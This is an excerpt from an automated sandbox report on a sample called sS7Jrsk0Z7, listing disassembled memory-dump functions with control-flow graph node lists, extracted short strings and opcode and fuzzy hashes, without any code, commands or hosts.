                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: <
                                                                                                              • API String ID: 0-4251816714
                                                                                                              • Opcode ID: b9475006230aa2fa24fec2e500d8b1b7d86659f6fe0310ba617cefb079382bbf
                                                                                                              • Instruction ID: b686533809f876fdcae0fb937f5f7d0c6efe771b272cf0bac08e916f0d992389
                                                                                                              • Opcode Fuzzy Hash: b9475006230aa2fa24fec2e500d8b1b7d86659f6fe0310ba617cefb079382bbf
                                                                                                              • Instruction Fuzzy Hash: 0A5175B1E01658CFDB59DFAAC9446DDBBF2AF89304F14C0AAD409AB264DB345A85CF00
                                                                                                              Function 07804328 Relevance: .6, Instructions: 596COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810511109.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7800000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 519bfd370b87a1c15b8ce87f3f84354663ece458e6baea94f0f29d3e58d0ccc8
                                                                                                              • Instruction ID: 871a023d35e293cdf19f2a74a4ce173f876cf3e3f54b36c6de685ef716c8078f
                                                                                                              • Opcode Fuzzy Hash: 519bfd370b87a1c15b8ce87f3f84354663ece458e6baea94f0f29d3e58d0ccc8
                                                                                                              • Instruction Fuzzy Hash: DE524E34A003458FDB14DF68C844B99B7F2BF86314F2582A9D5586F3A2DB71AD86CF81
                                                                                                              Function 07804318 Relevance: .6, Instructions: 588COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810511109.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7800000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10793a6a66e3c1db416cb6b1e22c09e7df03ac48fa8c0611dfbc85e9c7f373b1
                                                                                                              • Instruction ID: a3b2b1c58aefbbe1d1a2fb0cfaac43c50b51a3726a5e504312228d2ef1bbac8d
                                                                                                              • Opcode Fuzzy Hash: 10793a6a66e3c1db416cb6b1e22c09e7df03ac48fa8c0611dfbc85e9c7f373b1
                                                                                                              • Instruction Fuzzy Hash: FE525E34A00345CFDB14DF68C844B99B7F2BF86314F2582A9D5586F3A2DB71A986CF81
                                                                                                              Function 09016A50 Relevance: .3, Instructions: 324COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edaab89718c8323bf04136256808eea70f8ecbb6cff9355746bc31dc752c97af
                                                                                                              • Instruction ID: 4d2fcb2a9cb8a6a18575869d363399a4a97103a96b290ffbfe1ca600dc7daa34
                                                                                                              • Opcode Fuzzy Hash: edaab89718c8323bf04136256808eea70f8ecbb6cff9355746bc31dc752c97af
                                                                                                              • Instruction Fuzzy Hash: 15F10774A0566A8FDB64CF69C98479DBBB6BF88340F10D9EAD40EA7214D7709EC18F40
                                                                                                              Function 09018DA8 Relevance: .2, Instructions: 159COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 310761ee4b8073f6279f6569d3f5308deca00e87804c31e4891e485d9b0f7b65
                                                                                                              • Instruction ID: 2abafeb9c569e4635cdced12ede62ead365f34a7211b4f6eb82b4e33d00820ac
                                                                                                              • Opcode Fuzzy Hash: 310761ee4b8073f6279f6569d3f5308deca00e87804c31e4891e485d9b0f7b65
                                                                                                              • Instruction Fuzzy Hash: 5C6102B0E00219DFCB44CFE4D9456AEBBB2FF49341F54D82AE812A7250D7789A41CF95
                                                                                                              Function 0798CAD0 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c30ba93bc20fe8681addd855b5a99dc7221d982482267e8a5c1eb591e61e779d
                                                                                                              • Instruction ID: ab6d348f3262dac3aaf8d757e30d58a21320a886d3e3ad45e6fd1e45e31c4e41
                                                                                                              • Opcode Fuzzy Hash: c30ba93bc20fe8681addd855b5a99dc7221d982482267e8a5c1eb591e61e779d
                                                                                                              • Instruction Fuzzy Hash: 83310CB1E006198FEB58DF6ADC5079EBBF7AFC9210F14C1AAC408A7254DB345A85CF61
                                                                                                              Function 090114C0 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db57af6cfe6c1c5c99e8f828b3f35f3a3e0336d2db790c7673f8f888dda41968
                                                                                                              • Instruction ID: 00a18b98b8e46552ae5d03b5566c217e5352da69db266df2493919c34d9841ac
                                                                                                              • Opcode Fuzzy Hash: db57af6cfe6c1c5c99e8f828b3f35f3a3e0336d2db790c7673f8f888dda41968
                                                                                                              • Instruction Fuzzy Hash: 0621B971E056189BEB58CF6BD84069EF7F7AFC8200F04C5BAD908A6264EB341A468F51
                                                                                                              Function 010BDACB Relevance: 90.7, Strings: 72, Instructions: 694COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 10bdacb-10bdad1 1 10bdad3 0->1 2 10bdad4-10be815 0->2 1->2 261 10be820-10be84a call 10bd6a8 2->261 263 10be84f-10be869 call 10bd6a8 261->263
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-1174384227
                                                                                                              • Opcode ID: a2a5ff2646718686832589968e791593f11581cb1d5190475fb855d8881a5c2c
                                                                                                              • Instruction ID: f28f063fa754b1041b80242f121db85b6e1b2ebbe65a37e17f009bbf888860cf
                                                                                                              • Opcode Fuzzy Hash: a2a5ff2646718686832589968e791593f11581cb1d5190475fb855d8881a5c2c
                                                                                                              • Instruction Fuzzy Hash: 27721B34A0221AAFCB18EF75E9526ED7BF1FB44304F1086A8D04ABF255DB306E858F55
                                                                                                              Function 010BDAD8 Relevance: 90.7, Strings: 72, Instructions: 688COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 266 10bdad8-10be84a call 10bd6a8 526 10be84f-10be869 call 10bd6a8 266->526
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-1174384227
                                                                                                              • Opcode ID: 0122d2877d46c005246affead1e066d0fe35f447c46e19353487033c97668fc0
                                                                                                              • Instruction ID: 0dbf9c15b68596dd04b058a578fd1f0e829f5344b41c67b6ce64daa2eda0ef1a
                                                                                                              • Opcode Fuzzy Hash: 0122d2877d46c005246affead1e066d0fe35f447c46e19353487033c97668fc0
                                                                                                              • Instruction Fuzzy Hash: 56721B34A0221AAFCB18EF75E9526ED7BF1FB44304F1086A8D04ABF255DB306E858F55
                                                                                                              Function 010BA948 Relevance: 12.7, Strings: 10, Instructions: 170COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 529 10ba948-10ba973 530 10ba978-10ba97b 529->530 531 10ba97d 530->531 532 10ba984-10ba986 530->532 531->532 533 10bab8b-10bab90 531->533 534 10baae8-10baaf5 531->534 535 10bab68-10bab6c 531->535 536 10bab2e-10bab32 531->536 537 10baa2c-10baa60 531->537 538 10baacc-10baadb 531->538 539 10ba9a2 531->539 540 10bab01 531->540 541 10baa00-10baa29 531->541 542 10baafd-10baaff 531->542 543 10bab92 531->543 544 10ba9f6-10ba9fb 531->544 545 10ba996-10ba9a0 531->545 546 10ba988 532->546 547 10ba98f-10ba994 532->547 549 10bab22-10bab25 533->549 534->542 555 10bab6e-10bab80 535->555 556 10bab82 535->556 552 10bab53 536->552 553 10bab34-10bab3d 536->553 596 10baa62 call 10bac10 537->596 597 10baa62 call 10bac20 537->597 570 10baadd 538->570 571 10baae4-10baae6 538->571 548 10ba9a7-10ba9b4 539->548 540->549 541->537 551 10baac0-10baac3 542->551 550 10bab95-10baba9 543->550 544->550 545->548 554 10ba98d 546->554 547->554 558 10ba9ba-10ba9c2 548->558 559 10babb3-10babc2 548->559 549->536 565 10bab27 549->565 551->538 560 10baac5 551->560 568 10bab56-10bab58 552->568 566 10bab3f-10bab42 553->566 567 10bab44-10bab47 553->567 554->530 557 10bab85 555->557 556->557 557->533 558->559 569 10ba9c8-10ba9da 558->569 560->533 560->534 560->535 560->536 560->538 560->540 560->542 560->543 565->533 565->535 565->536 565->543 573 10bab51 566->573 567->573 574 10bab5a 568->574 575 10bab61-10bab66 568->575 569->559 576 10ba9e0-10ba9e6 569->576 577 10baae2 570->577 571->577 573->568 580 10bab5f 574->580 575->580 581 10ba9e8 576->581 582 10ba9ef-10ba9f4 576->582 577->551 580->549 583 10ba9ed 581->583 582->583 583->530 585 10baa68-10baa6e 586 10baa72-10baa7e 585->586 587 10baa70 585->587 588 10baa80-10baa9b 586->588 587->588 594 10baa9d call 10bb5b3 588->594 595 10baa9d call 10bb5c0 588->595 592 10baaa3-10baabb 592->551 594->592 595->592 596->585 597->585
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: x+$Yq$Yq$Yq$d^t$d^t$d^t$d^t$d^t$d^t
                                                                                                              • API String ID: 0-3576056149
                                                                                                              • Opcode ID: 1d0a734963d0469a6b7e06704b8b439bc6fb4dcdbe58e488c30e5e6faa291365
                                                                                                              • Instruction ID: 69897d3bd6c86320f0dd8c8dc8569d55a66e35b8c043c860700db04a7841e6fc
                                                                                                              • Opcode Fuzzy Hash: 1d0a734963d0469a6b7e06704b8b439bc6fb4dcdbe58e488c30e5e6faa291365
                                                                                                              • Instruction Fuzzy Hash: 1751A334B04204CFDB158F69C590BED77F2FB49350F64896AD4A6AB282DB39CC41CB61
                                                                                                              Function 010B54D9 Relevance: 11.4, Strings: 9, Instructions: 175COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 880 10b54d9-10b552c 884 10b5532-10b5546 880->884 885 10b5747-10b5756 880->885 946 10b5548 call 10b58d8 884->946 947 10b5548 call 10b57a0 884->947 886 10b554e-10b5560 886->885 889 10b5566-10b556a 886->889 890 10b556e-10b557f 889->890 891 10b556c 889->891 890->885 896 10b5585 890->896 892 10b558d-10b558f 891->892 894 10b55a9-10b55ac 892->894 895 10b5591-10b5597 892->895 899 10b55b1-10b55b4 894->899 897 10b559b-10b55a7 895->897 898 10b5599 895->898 896->892 897->894 898->894 900 10b55bd-10b55d4 899->900 901 10b55b6 899->901 915 10b561c-10b561e 900->915 916 10b55d6 900->916 901->900 903 10b55dd-10b5615 901->903 904 10b56b2-10b56d6 901->904 905 10b5722 901->905 906 10b5670-10b5674 901->906 907 10b56e7-10b56f6 901->907 908 10b5706-10b5720 901->908 909 10b5625-10b5642 901->909 903->915 934 10b56db-10b56de 904->934 905->885 911 10b5697 906->911 912 10b5676-10b567f 906->912 925 10b56f8 907->925 926 10b56ff-10b5704 907->926 908->934 935 10b5620 909->935 936 10b5644-10b5646 909->936 920 10b569a-10b56a9 911->920 913 10b5681-10b5684 912->913 914 10b5686-10b5693 912->914 923 10b5695 913->923 914->923 924 10b55db 915->924 916->924 920->904 923->920 924->899 929 10b56fd 925->929 926->929 929->934 934->907 937 10b56e0 934->937 935->909 938 10b5648-10b564a 936->938 939 10b564e-10b5651 936->939 937->905 937->907 937->908 938->935 941 10b564c 938->941 939->935 942 10b5653-10b5656 939->942 941->942 942->935 943 10b5658-10b565a 942->943 945 10b5664-10b566b 943->945 945->899 946->886 947->886
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D@$XXq$XXq$XXq$XXq$XXq$XXq$XXq$XXq
                                                                                                              • API String ID: 0-2668322306
                                                                                                              • Opcode ID: f6487a10684549babc60b15249ad7d1a79082262f90d427a3d3b012d0237fa77
                                                                                                              • Instruction ID: 4bbda64f7e50d6f4a2cb74e9b7f107f1e43b656196f97c48d8310ea1b96698b1
                                                                                                              • Opcode Fuzzy Hash: f6487a10684549babc60b15249ad7d1a79082262f90d427a3d3b012d0237fa77
                                                                                                              • Instruction Fuzzy Hash: B951C930F002049FEB149B79ED957EE76F2BFC8310F2884AAD545AF394DA758C418B62
                                                                                                              Function 010B5358 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 5509 10b5358-10b5378 5510 10b537d-10b5380 5509->5510 5511 10b5389-10b539c 5510->5511 5512 10b5382 5510->5512 5521 10b539e 5511->5521 5522 10b53a0-10b53a2 5511->5522 5512->5511 5513 10b5439-10b543b 5512->5513 5514 10b5443-10b5450 5512->5514 5515 10b5440 5512->5515 5516 10b53b7-10b53c5 5512->5516 5513->5510 5517 10b547d-10b548a 5514->5517 5518 10b5452-10b545f 5514->5518 5515->5514 5526 10b53e3 5516->5526 5527 10b53c7-10b53cd 5516->5527 5518->5517 5520 10b5461-10b547c 5518->5520 5524 10b53ac-10b53af 5521->5524 5522->5524 5524->5516 5528 10b53e5-10b53f4 5526->5528 5529 10b53cf-10b53d1 5527->5529 5530 10b53d3-10b53df 5527->5530 5534 10b540a 5528->5534 5535 10b53f6-10b5408 5528->5535 5531 10b53e1 5529->5531 5530->5531 5531->5528 5536 10b540d-10b540f 5534->5536 5535->5536 5537 10b5418-10b5432 call 10b4f4c 5536->5537 5538 10b5411 5536->5538 5540 10b5437 5537->5540 5538->5537 5540->5513
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: XI$XI$XI$XI
                                                                                                              • API String ID: 0-2736759378
                                                                                                              • Opcode ID: 96195b120ba6ca5307a65bf143cc90160aa8238c8eda499786a089e7ef90a1f5
                                                                                                              • Instruction ID: 68f4cb775043bfda707bcf2be136a65aa17efdfc565ece134f3f73eda4756f87
                                                                                                              • Opcode Fuzzy Hash: 96195b120ba6ca5307a65bf143cc90160aa8238c8eda499786a089e7ef90a1f5
                                                                                                              • Instruction Fuzzy Hash: D631A370A0520ACFDB15DB68C8956EEBBF2EF85304F2484AAC055AF352DB749D41CBA1
                                                                                                              Function 078B1F30 Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 6463 78b1f30-78b1f55 6464 78b1f5b-78b1f5d 6463->6464 6465 78b20a9-78b20ce 6463->6465 6466 78b1f63-78b1f6c 6464->6466 6467 78b20d5-78b211a 6464->6467 6465->6467 6468 78b1f7f-78b1fa6 6466->6468 6469 78b1f6e-78b1f7c 6466->6469 6499 78b211c-78b2122 6467->6499 6500 78b2123-78b2129 6467->6500 6472 78b202f-78b2033 6468->6472 6473 78b1fac-78b1fbe call 78b1870 6468->6473 6469->6468 6474 78b206a-78b2083 6472->6474 6475 78b2035-78b2062 call 78b1538 6472->6475 6473->6472 6490 78b1fc0-78b2013 6473->6490 6484 78b208d-78b208e 6474->6484 6485 78b2085 6474->6485 6494 78b2067 6475->6494 6484->6465 6485->6484 6490->6472 6495 78b2015-78b2028 6490->6495 6494->6474 6495->6472 6499->6500 6501 78b212b-78b213b 6499->6501 6500->6501 6502 78b213d-78b2146 6501->6502 6503 78b2147-78b218a 6501->6503 6509 78b218c-78b2191 6503->6509 6510 78b2193-78b221c 6503->6510 6509->6510 6512 78b2222-78b2230 6510->6512 6513 78b2239-78b2271 6512->6513 6514 78b2232-78b2238 6512->6514 6518 78b2273-78b2277 6513->6518 6519 78b2281 6513->6519 6514->6513 6518->6519 6520 78b2279 6518->6520 6521 78b2282 6519->6521 6520->6519 6521->6521
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$(q$(q
                                                                                                              • API String ID: 0-2103260149
                                                                                                              • Opcode ID: e47972319b0af35a89f2637e21c972bd116534b04986d56e89c0ce74ab92de0f
                                                                                                              • Instruction ID: b68e5ad86494ec0ab53bbb29e1f42fcb8a05f5b8ada97edd1b102ffa6da811cd
                                                                                                              • Opcode Fuzzy Hash: e47972319b0af35a89f2637e21c972bd116534b04986d56e89c0ce74ab92de0f
                                                                                                              • Instruction Fuzzy Hash: 1CA17BB0E003099FDB25DFA9D84879EBBF1FF89310F14855AE805AB391DB709985CB91
                                                                                                              Function 078B05F0 Relevance: 3.5, Strings: 2, Instructions: 991COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: c9dce9f9ae1363cc558d545a85b7ff6a41a30d41e96d834046d13f3358f7bda8
                                                                                                              • Instruction ID: f8bfb09f9fd1346e8f1d8c1b69ca8dcc9979cfbb3701b18372fc3929618ff0f6
                                                                                                              • Opcode Fuzzy Hash: c9dce9f9ae1363cc558d545a85b7ff6a41a30d41e96d834046d13f3358f7bda8
                                                                                                              • Instruction Fuzzy Hash: 8882E171E08354CFC705ABB8D8A975D7FB1AF46300F4641EAD085DB3A6DA389C49CB62
                                                                                                              Function 010B9108 Relevance: 3.3, Strings: 2, Instructions: 785COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: ec4188e1ad46eb09894df38363291abe2b69eca6de8c8276ae1b69fae87b531a
                                                                                                              • Instruction ID: e209b2d880b6b21a01bd815bc8cbfaacd36202fc41c1615453ccca7f1232aabe
                                                                                                              • Opcode Fuzzy Hash: ec4188e1ad46eb09894df38363291abe2b69eca6de8c8276ae1b69fae87b531a
                                                                                                              • Instruction Fuzzy Hash: A7624270A002188FFB25DBA4C954BDEBBB6EF88300F1081ADD10A6B3A5DE359D41DF65
                                                                                                              Function 078B2510 Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq$Hq
                                                                                                              • API String ID: 0-925789375
                                                                                                              • Opcode ID: 79b945ea16a580e0679c8c3373821159f72a1dfcaeca1a5a0ec708e0f184ab9c
                                                                                                              • Instruction ID: 9ff9f72de11c3dd1843e476775216b8e37ad3c104cd157a0ce4fd65191e80729
                                                                                                              • Opcode Fuzzy Hash: 79b945ea16a580e0679c8c3373821159f72a1dfcaeca1a5a0ec708e0f184ab9c
                                                                                                              • Instruction Fuzzy Hash: 5DC1DF71B103148BCB04BBBDE49A66E7FB6AFC9300F444569E046E7394DE38DC4983A2
                                                                                                              Function 010B66C3 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq$Hq
                                                                                                              • API String ID: 0-925789375
                                                                                                              • Opcode ID: 31f27076415ab37afe6853a99077f9cdcdec573b9d4e2844d17954c4667e0612
                                                                                                              • Instruction ID: 798249e53108fe1d860f493566c69faa678f6d00b1180840432ca5b3ebe04d81
                                                                                                              • Opcode Fuzzy Hash: 31f27076415ab37afe6853a99077f9cdcdec573b9d4e2844d17954c4667e0612
                                                                                                              • Instruction Fuzzy Hash: 6DA103307002099FEB05AF69D894BBE7BF6FB88342F148469E546DB291CB75DC42CB90
                                                                                                              Function 010B6DC8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$,q
                                                                                                              • API String ID: 0-1667412543
                                                                                                              • Opcode ID: 699df23b58427956e18aee4f1f8c3d1ecc4142cd37ef3dcc9de07276d4b521b8
                                                                                                              • Instruction ID: da1aecdfd26b28208e70d6e0815595482cb60923c48a27bc30dc8917ffb3c22b
                                                                                                              • Opcode Fuzzy Hash: 699df23b58427956e18aee4f1f8c3d1ecc4142cd37ef3dcc9de07276d4b521b8
                                                                                                              • Instruction Fuzzy Hash: 54817D34A011068FDB54CF6DC8C4AAEBBF2BF89314B5480A9D566DB3A5DB32E841CB50
                                                                                                              Function 078B36C0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TJq$Teq
                                                                                                              • API String ID: 0-3317343146
                                                                                                              • Opcode ID: 24f28641874cc1e901f9ad9242a12fcb9933dc1b8f79db16befe499f1e04b11b
                                                                                                              • Instruction ID: 90746b94bd50a01084ef52c5c61fdfeca2be87eba0c65ff9300425d357edb04a
                                                                                                              • Opcode Fuzzy Hash: 24f28641874cc1e901f9ad9242a12fcb9933dc1b8f79db16befe499f1e04b11b
                                                                                                              • Instruction Fuzzy Hash: D9F0F6317101100FCA08A77DB468B3E76EFAFC97207144059F506DB3A5CD64DC064395
                                                                                                              Function 078B2CFB Relevance: 1.8, Strings: 1, Instructions: 557COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 337495936e0e28f799a319aebae885969804ba93634ebbad33c4dae018dd3ec5
                                                                                                              • Instruction ID: b7af846b753a984aeb2eda1e79a91f27287869d8c571e41101d709cf32395305
                                                                                                              • Opcode Fuzzy Hash: 337495936e0e28f799a319aebae885969804ba93634ebbad33c4dae018dd3ec5
                                                                                                              • Instruction Fuzzy Hash: EF128B71B142148BDB04FBB8E489B6D7FB2EB88300F654529E046E37A9DE38E854DB51
                                                                                                              Function 078B2D08 Relevance: 1.8, Strings: 1, Instructions: 555COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
